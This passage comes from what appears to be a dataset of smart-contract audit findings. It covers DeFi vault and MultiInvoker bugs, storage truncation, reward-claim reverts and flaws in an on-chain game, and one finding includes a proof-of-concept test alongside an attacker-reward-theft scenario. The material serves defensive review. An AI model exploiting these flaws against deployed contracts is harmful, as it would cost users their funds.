markets leverage calculations, allowing to increase vault's actual leverage.чConsider subtracting pending fees when loading underlying markets data context in the vault.чWhen vault TVL is small and keeper fees are high enough, it's possible to intentionally increase actual vault leverage and liquidate the vault by creating many small deposits from different user accounts, making the vault users lose their funds.ч```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n -`MultiInvoker._latest` will return `latestPrice = 0` when latest oracle version is invalid causing liquidation to send 0 fee to liquidator or incorrect order executionчmediumчThere was a slight change of oracle versions handling in 2.1: now each requested oracle version must be commited, either as valid or invalid. This means that now the latest version can be invalid (price = 0). This is handled correctly in `Market`, which only uses timestamp from the latest oracle version, but the price comes either from latest version (if valid) or `global.latestPrice` (if invalid).\\nHowever, `MultiInvoker` always uses price from `oracle.latest` without verifying if it's valid, meaning it will return `latestPrice = 0` if the latest oracle version is invalid. This is returned from the `_latest` function.\\nSuch latest price = 0 leads to 2 main problems:\\nLiquidations orders in MultiInvoker will send 0 liquidation fee to liquidator (will liquidate for free)\\nSome TriggerOrders will trigger incorrectly (canExecuteOrder will return true when the real price didn't reach the trigger price, or false even if the real prices reached the trigger price)\\n`MultiInvoker._latest` has the following code for latest price assignment:\\n```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n\\nThis `latestPrice` is what's returned from the `_latest`, it isn't changed anywhere else. Notice that there is no check for latest oracle version validity.\\nAnd this is the code for KeeperOracle._commitRequested:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nNotice that commits made outside the timeout window simply increase `_global.latestIndex` without assigning `_prices`, meaning it remains 0 (invalid). This means that latest oracle version will return price=0 and will be invalid if commited after the timeout from request time has passed.\\nPrice returned by `_latest` is used when calculating liquidationFee:\\n```\\nfunction _liquidationFee(IMarket market, address account) internal view returns (Position memory, UFixed6, UFixed6) {\\n // load information about liquidation\\n RiskParameter memory riskParameter = market.riskParameter();\\n@@@ (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) = _latest(market, account);\\n\\n // create placeholder order for liquidation fee calculation (fee is charged the same on all sides)\\n Order memory placeholderOrder;\\n placeholderOrder.maker = Fixed6Lib.from(closableAmount);\\n\\n return (\\n latestPosition,\\n placeholderOrder\\n@@@ .liquidationFee(OracleVersion(latestPosition.timestamp, latestPrice, true), riskParameter)\\n .min(UFixed6Lib.from(market.token().balanceOf(address(market)))),\\n closableAmount\\n );\\n}\\n```\\n\\n`liquidationFee` calculation in order multiplies order size by `latestPrice`, meaning it will be 0 when price = 0. This liquidation fee is then used in `market.update` for liquidation fee to receive by liquidator:\\n```\\n function _liquidate(IMarket market, address account, bool revertOnFailure) internal isMarketInstance(market) {\\n@@@ (Position memory latestPosition, UFixed6 liquidationFee, UFixed6 closable) = _liquidationFee(market, account);\\n Position memory currentPosition = market.pendingPositions(account, market.locals(account).currentId);\\n currentPosition.adjust(latestPosition);\\n\\n try market.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n@@@ Fixed6Lib.from(-1, liquidationFee),\\n true\\n```\\n\\nThis means liquidator will receive 0 fee for the liquidation.\\nIt is also used in canExecuteOrder:\\n```\\n function _executeOrder(address account, IMarket market, uint256 nonce) internal {\\n if (!canExecuteOrder(account, market, nonce)) revert MultiInvokerCantExecuteError();\\n// rest of code\\n function canExecuteOrder(address account, IMarket market, uint256 nonce) public view returns (bool) {\\n TriggerOrder memory order = orders(account, market, nonce);\\n if (order.fee.isZero()) return false;\\n@@@ (, Fixed6 latestPrice, ) = _latest(market, account);\\n@@@ return order.fillable(latestPrice);\\n }\\n```\\n\\nMeaning `canExecuteOrder` will do comparision with price = 0 instead of real latest price. For example: limit buy order to buy when price <= 1000 (when current price = 1100) will trigger and execute buy at the price = 1100 instead of 1000 or lower.ч`_latest` should replicate the process for the latest price from `Market` instead of using price from the oracle's latest version:\\nif the latest oracle version is valid, then use its price\\nif the latest oracle version is invalid, then iterate all global pending positions backwards and use price of any valid oracle version at the position.\\nif all pending positions are at invalid oracles, use market's `global.latestPrice`чliquidation done after invalid oracle version via `MultiInvoker` `LIQUIDATE` action will charge and send 0 liquidation fee from the liquidating account, thus liquidator loses these funds.\\nsome orders with comparison of type -1 (<= price) will incorrectly trigger and will be executed when price is far from reaching the trigger price. This loses user funds due to unexpected execution price of the pending order.ч```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n -`MultiInvoker._latest` calculates incorrect closable for the current oracle version causing some liquidations to revertчmediumч`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. There is one tricky edge case at the current oracle version which is calculated incorrectly in `MultiInvoker` (and also in Vault). This happens when pending position is updated in the current active oracle version: it is allowed to set this current position to any value conforming to `closable` of the previous pending (or latest) position. For example:\\nlatest settled position = 10\\nuser calls update(20) - pending position at t=200 is set to 20. If we calculate `closable` normally, it will be 10 (latest settled position).\\nuser calls update(0) - pending position at t=200 is set to 0. This is valid and correct. It looks as if we've reduced position by 20, bypassing the `closable` = 10 value, but in reality the only enforced `closable` is the previous one (for latest settled position in the example, so it's 10) and it's enforced as a change from previous position, not from current.\\nNow, if the step 3 happened in the next oracle version, so 3. user calls update(0) - pending position at t=300 will revert, because user can't close more than 10, and he tries to close 20.\\nSo in such tricky edge case, `MultiInvoker` (and Vault) will calculate `closable = 10` and will try to liquidate with position = 20-10 = 10 instead of 0 and will revert, because `Market._invariant` will calculate `closable = 10` (latest = 10, pending = 10, closable = latest = 10), but it must be 0 to liquidate (step 3. in the example above)\\nIn `Vault` case, this is less severe as the market will simply allow to redeem and will close smaller amount than it actually can.\\nWhen `Market` calculates `closable`, it's calculated starting from latest settled position up to (but not including) current position:\\n```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n\\nPay attention to `id < context.local.currentId` - the loop doesn't include currentId.\\nAfter the current position is updated to a new user specified value, only then the current position is processed and closable now includes new user position change from the previous position:\\n```\\nfunction _update(\\n // rest of code\\n // load\\n _loadUpdateContext(context, account);\\n // rest of code\\n context.currentPosition.local.update(collateral);\\n // rest of code\\n // process current position\\n _processPendingPosition(context, context.currentPosition.local);\\n // rest of code\\n // after\\n _invariant(context, account, newOrder, collateral, protected);\\n```\\n\\nThe `MultiInvoker._latest` logic is different and simply includes calculation of `closable` for all pending positions:\\n```\\nfor (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n}\\n```\\n\\nThe same incorrect logic is in a Vault:\\n```\\n// pending positions\\nfor (uint256 id = marketContext.local.latestId + 1; id <= marketContext.local.currentId; id++)\\n previousClosable = _loadPosition(\\n marketContext,\\n marketContext.currentAccountPosition = registration.market.pendingPositions(address(this), id),\\n previousClosable\\n );\\n```\\nчWhen calculating `closable` in `MultiInvoker` and `Vault`, add the following logic:\\nif timestamp of pending position at index currentId equals current oracle version, then add the difference between position size at currentId and previous position size to `closable` (both when that position increases and decreases).\\nFor example, if\\nlatest settled position = `10`\\npending position at t=200 = 20 then initialize `closable` to `10` (latest) add (pending-latest) = (20-10) to `closable` (closable = 20)чIn the following edge case:\\ncurrent oracle version = oracle version of the pending position in currentId index\\nAND this (current) pending position increases compared to previous pending/settled position\\nThe following can happen:\\nliquidation via `MultiInvoker` will revert (medium impact)\\nvault's `maxRedeem` amount will be smaller than actual allowed amount, position will be reduced by a smaller amount than they actually can (low impact)ч```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n -MultiInvoker closableAmount the calculation logic is wrongчmediumчin `MultiInvoker._latest()` The incorrect use of `previousMagnitude = latestPosition.magnitude()` has led to an error in the calculation of `closableAmount`. This has caused errors in judgments that use this variable, such as `_liquidationFee()`.\\nThere are currently multiple places where the user's `closable` needs to be calculated, such as `market.update()`. The calculation formula is as follows in the code: `Market.sol`\\n```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n\\nIt will loop through `pendingPostion`, and each loop will set the variable `context.previousPendingMagnitude = newPendingPosition.magnitude();` to be used as the basis for the calculation of the next `pendingPostion`.\\n`closableAmount` is also calculated in `MultiInvoker._latest()`. The current implementation is as follows:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n }\\n```\\n\\nThis method also loops through `pendingPosition`, but incorrectly uses `latestPosition.magnitude()` to set `previousMagnitude`, `previousMagnitude` = latestPosition.magnitude();. The correct way should be `previousMagnitude = currentPendingPosition.magnitude()` like `market.sol`. This mistake leads to an incorrect calculation of `closableAmount`.ч```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready// Remove the line below\\nto// Remove the line below\\nbe// Remove the line below\\nsettled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId // Add the line below\\n 1; id <= local.currentId; id// Add the line below\\n// Add the line below\\n) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n// Remove the line below\\n previousMagnitude = latestPosition.magnitude();\\n// Add the line below\\n previousMagnitude = pendingPosition.magnitude();\\n }\\n }\\n }\\n```\\nчThe calculation of `closableAmount` is incorrect, which leads to errors in the judgments that use this variable, such as `_liquidationFee()`.ч```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n -interfaceFee Incorrectly converted uint40 when storedчmediumчThe `interfaceFee.amount` is currently defined as `uint48` , with a maximum value of approximately `281m`. However, it is incorrectly converted to `uint40` when saved, `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`, which means the maximum value can only be approximately `1.1M`. If a user sets an order where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully but the actual stored value may be truncated to `0`. This is not what the user expects, and the user may think that the order has been set, but in reality, it is an incorrect order. Although a fee of `1.1M` is large, it is not impossible.\\n`interfaceFee.amount` is defined as `uint48` the legality check also uses `type(uint48).max`, but `uint40` is used when saving.\\n```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n\\nWe can see that when saving, it is forcibly converted to `uint40`, as in `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`. The order can be saved successfully, but the actual storage may be truncated to `0`.ч```\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n// Remove the line below\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n// Add the line below\\n uint48(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\nчFor orders where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully, but the actual storage may be truncated to `0`. This is not what users expect and may lead to incorrect fee payments when the order is executed. Although a fee of `1.1M` is large, it is not impossible.ч```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n -vault.claimReward() If have a market without reward token, it may cause all markets to be unable to retrieve rewards.чmediumчIn `vault.claimReward()`, it will loop through all `market` of `vault` to execute `claimReward()`, and transfer `rewards` to `factory().owner()`. If one of the markets does not have `rewards`, that is, `rewardToken` is not set, `Token18 reward = address(0)`. Currently, the loop does not make this judgment `reward != address(0)`, it will also execute `market.claimReward()`, and the entire method will `revert`. This leads to other markets with `rewards` also being unable to retrieve `rewards`.\\nThe current implementation of `vault.claimReward()` is as follows:\\n```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n\\nWe can see that the method loops through all the `market` and executes `market.claimReward()`, and `reward().push()`.\\nThe problem is, not every market has `rewards` tokens. market.sol's `rewards` are not forcibly set in `initialize()`. The market's `makerRewardRate.makerRewardRate` is also allowed to be 0.\\n```\\ncontract Market is IMarket, Instance, ReentrancyGuard {\\n /// @dev The token that incentive rewards are paid in\\n Token18 public reward;\\n\\n function initialize(IMarket.MarketDefinition calldata definition_) external initializer(1) {\\n __Instance__initialize();\\n __ReentrancyGuard__initialize();\\n\\n token = definition_.token;\\n oracle = definition_.oracle;\\n payoff = definition_.payoff;\\n }\\n// rest of code\\n\\n\\nlibrary MarketParameterStorageLib {\\n// rest of code\\n function validate(\\n MarketParameter memory self,\\n ProtocolParameter memory protocolParameter,\\n Token18 reward\\n ) public pure {\\n if (self.settlementFee.gt(protocolParameter.maxFeeAbsolute)) revert MarketParameterStorageInvalidError();\\n\\n if (self.fundingFee.max(self.interestFee).max(self.positionFee).gt(protocolParameter.maxCut))\\n revert MarketParameterStorageInvalidError();\\n\\n if (self.oracleFee.add(self.riskFee).gt(UFixed6Lib.ONE)) revert MarketParameterStorageInvalidError();\\n\\n if (\\n reward.isZero() &&\\n (!self.makerRewardRate.isZero() || !self.longRewardRate.isZero() || !self.shortRewardRate.isZero())\\n ) revert MarketParameterStorageInvalidError();\\n```\\n\\nThis means that `market.sol` can be without `rewards token`.\\nIf there is such a market, the current `vault.claimReward()` will `revert`, causing other markets with `rewards` to also be unable to retrieve `rewards`.ч```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (_registrations[marketId].read().market.reward().isZero()) continue;\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\nчIf the `vault` contains markets without `rewards`, it will cause other markets with `rewards` to also be unable to retrieve `rewards`.ч```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n -_killWoundedAgentsчhighчThe `_killWoundedAgents` function only checks the status of the agent, not when it was wounded.\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n\\nSo when `fulfillRandomWords` kills agents that were wounded and unhealed at round `currentRoundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD`, it will also kill the agent who was healed and wounded again after that round.\\nAlso, since `fulfillRandomWords` first draws the new wounded agents before kills agents, in the worst case scenario, agent could die immediately after being wounded in this round.\\n```\\nif (activeAgents > NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n uint256 woundedAgents = _woundRequestFulfilled(\\n currentRoundId,\\n currentRoundAgentsAlive,\\n activeAgents,\\n currentRandomWord\\n );\\n\\n uint256 deadAgentsFromKilling;\\n if (currentRoundId > ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD) {\\n deadAgentsFromKilling = _killWoundedAgents({\\n roundId: currentRoundId.unsafeSubtract(ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD),\\n currentRoundAgentsAlive: currentRoundAgentsAlive\\n });\\n }\\n```\\n\\nThis is the PoC test code. You can add it to the Infiltration.fulfillRandomWords.t.sol file and run it.\\n```\\nfunction test_poc() public {\\n\\n _startGameAndDrawOneRound();\\n\\n uint256[] memory randomWords = _randomWords();\\n uint256[] memory woundedAgentIds;\\n\\n for (uint256 roundId = 2; roundId <= ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1; roundId++) {\\n\\n if(roundId == 2) { // heal agent. only woundedAgentIds[0] dead.\\n (woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 1});\\n assertEq(woundedAgentIds.length, 20);\\n\\n _drawXRounds(1);\\n\\n _heal({roundId: 3, woundedAgentIds: woundedAgentIds});\\n\\n _startNewRound();\\n\\n // everyone except woundedAgentIds[0] is healed\\n uint256 agentIdThatWasKilled = woundedAgentIds[0];\\n\\n IInfiltration.HealResult[] memory healResults = new IInfiltration.HealResult[](20);\\n for (uint256 i; i < 20; i++) {\\n healResults[i].agentId = woundedAgentIds[i];\\n\\n if (woundedAgentIds[i] == agentIdThatWasKilled) {\\n healResults[i].outcome = IInfiltration.HealOutcome.Killed;\\n } else {\\n healResults[i].outcome = IInfiltration.HealOutcome.Healed;\\n }\\n }\\n\\n expectEmitCheckAll();\\n emit HealRequestFulfilled(3, healResults);\\n\\n expectEmitCheckAll();\\n emit RoundStarted(4);\\n\\n randomWords[0] = (69 * 10_000_000_000) + 9_900_000_000; // survival rate 99%, first one gets killed\\n\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(3), randomWords);\\n\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n if (woundedAgentIds[i] != agentIdThatWasKilled) {\\n _assertHealedAgent(woundedAgentIds[i]);\\n }\\n }\\n\\n roundId += 2; // round 2, 3 used for healing\\n }\\n\\n _startNewRound();\\n\\n // Just so that each round has different random words\\n randomWords[0] += roundId;\\n\\n if (roundId == ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1) { // wounded agents at round 1 are healed, only woundedAgentIds[0] was dead.\\n (uint256[] memory woundedAgentIdsFromRound, ) = infiltration.getRoundInfo({\\n roundId: uint40(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD)\\n });\\n\\n // find re-wounded agent after healed\\n uint256[] memory woundedAfterHeal = new uint256[](woundedAgentIds.length);\\n uint256 totalWoundedAfterHeal;\\n for (uint256 i; i < woundedAgentIds.length; i ++){\\n uint256 index = infiltration.agentIndex(woundedAgentIds[i]);\\n IInfiltration.Agent memory agent = infiltration.getAgent(index);\\n if (agent.status == IInfiltration.AgentStatus.Wounded) {\\n woundedAfterHeal[i] = woundedAgentIds[i]; // re-wounded agent will be killed\\n totalWoundedAfterHeal++;\\n }\\n else{\\n woundedAfterHeal[i] = 0; // set not wounded again 0\\n }\\n\\n }\\n expectEmitCheckAll();\\n emit Killed(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD, woundedAfterHeal);\\n }\\n\\n expectEmitCheckAll();\\n emit RoundStarted(roundId + 1);\\n\\n uint256 requestId = _computeVrfRequestId(uint64(roundId));\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(requestId, randomWords);\\n }\\n}\\n```\\nчCheck woundedAt at `_killWoundedAgents`\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n// Remove the line below\\n if (agents[index].status == AgentStatus.Wounded) {\\n// Add the line below\\n if (agents[index].status == AgentStatus.Wounded && agents[index].woundedAt == roundId) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\nчThe user pays tokens to keep the agent alive, but agent will die even if agent success to healed. The user has lost tokens and is forced out of the game.ч```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n -Attacker can steal reward of actual winner by force ending the gameчhighчCurrently following scenario is possible: There is an attacker owning some lower index agents and some higher index agents. There is a normal user owing one agent with an index between the attackers agents. If one of the attackers agents with an lower index gets wounded, he can escape all other agents and will instantly win the game, even if the other User has still one active agent.\\nThis is possible because because the winner is determined by the agent index, and escaping all agents at once wont kill the wounded agent because the game instantly ends.\\nFollowing check inside startNewRound prevents killing of wounded agents by starting a new round:\\n```\\nuint256 activeAgents = 